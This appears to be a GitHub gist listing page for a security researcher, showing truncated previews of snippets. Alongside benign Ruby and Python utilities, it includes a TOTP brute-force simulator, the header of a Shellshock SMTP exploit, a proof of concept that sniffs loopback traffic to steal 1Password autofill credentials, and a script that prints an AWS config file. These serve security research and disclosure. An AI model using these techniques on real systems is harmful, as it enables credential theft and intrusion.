Skip to content

Instantly share code, notes, and snippets.

Avatar
🦬

Jonathan Claudius claudijd

🦬
View GitHub Profile
@claudijd
claudijd / example5.rb
Created Jun 28, 2013
Ruby OpenSSL using verify peer and system cert store.
View example5.rb
>> require 'socket'
=> true
>> require 'openssl'
=> true
>>
?> ssl_context = OpenSSL::SSL::SSLContext.new
=> #<OpenSSL::SSL::SSLContext:0x007ffc9a9deb00>
>> ssl_context.verify_mode = OpenSSL::SSL::VERIFY_PEER
=> 1
>> cert_store = OpenSSL::X509::Store.new
@claudijd
claudijd / poc.py
Last active Oct 30, 2021
Example method to obtain a bearer token and obtain users uuid
View poc.py
import json
import requests
import pdb
import os
BASE_URL = "https://auth.mozilla.auth0.com"
def get_bearer_token():
url = BASE_URL + '/oauth/token'
@claudijd
claudijd / totp_bruteforce_simulator.rb
Last active Aug 23, 2021
TOTP Bruteforce Simulation Code ("How practical is TOTP bruteforcing?")
View totp_bruteforce_simulator.rb
# A proof of concept to demonstrate TOTP bruteforcing concepts
# Parameters to control simulation behavior###
request_rate = 4
totp_validity_window = 90 #in seconds
totp_guesses_per_auth_session = request_rate * totp_validity_window # number of totp guesses per auth session
simulated_logins = 100 # number of simulated logins to help determine average rate of TOTP collision
##############################################
# Helper Methods
@claudijd
claudijd / exploit.py
Last active Aug 7, 2021
Postfix Shellshock PoC Testing
View exploit.py
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
View hello.py
log = open("/Users/jclaudius/.aws/config", "r")
for line in log:
print(line)
View clean_downloads.py
import glob
import os
import os.path
import shutil
mydir = "/Users/jclaudius/Downloads/"
filelist = glob.glob(os.path.join(mydir, "*"))
for f in filelist:
if os.path.isdir(f):
View clean_desktop.py
import os
import shutil
path = "/Users/jclaudius/Desktop/"
moveto = "/Users/jclaudius/Desktop/Archive/"
files = os.listdir(path)
files.sort()
for f in files:
if not os.path.isdir(f):
src = path+f
@claudijd
claudijd / example.py
Created Nov 15, 2019
boto => boto3 file upload
View example.py
# In boto
import boto
conn = boto.connect_s3(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key)
bucket = conn.get_bucket(bucket_name, validate=False)
key = boto.s3.key.Key(bucket)
key.key = key_name
key.set_contents_from_filename(file_path)
url = "https://{}.s3.amazonaws.com/{}".format(bucket.name, key.name)
@claudijd
claudijd / steal_1password_creds.rb
Last active Oct 10, 2019
Steal 1Password credentials from browser auto-fill PoC
View steal_1password_creds.rb
# Path setting slight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'
capture_thread = Thread.new do
cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
cap.stream.each do |p|
pkt = PacketFu::Packet.parse p
if pkt.payload.include?("executeFillScript")
View poc.py
import re
# Current
>>> re.search(r"((ssh|https)://)?(git@)?github.com[:/](?P<repo_name>[A-Za-z0-9\/\-_]+)(.git)?", "bananas://github.com:/")
'/'
# Proposed
>>> re.search(r"^((https|ssh)://)?(git@)?github.com/(?P<repo_name>[A-Za-z0-9\/\-_]+)(.git)?$", "https://github.com/org/foo").group("repo_name")
'org/foo'
>>> re.search(r"^((https|ssh)://)?(git@)?github.com/(?P<repo_name>[A-Za-z0-9\/\-_]+)(.git)?$", "https://github.com/org/foo.git").group("repo_name")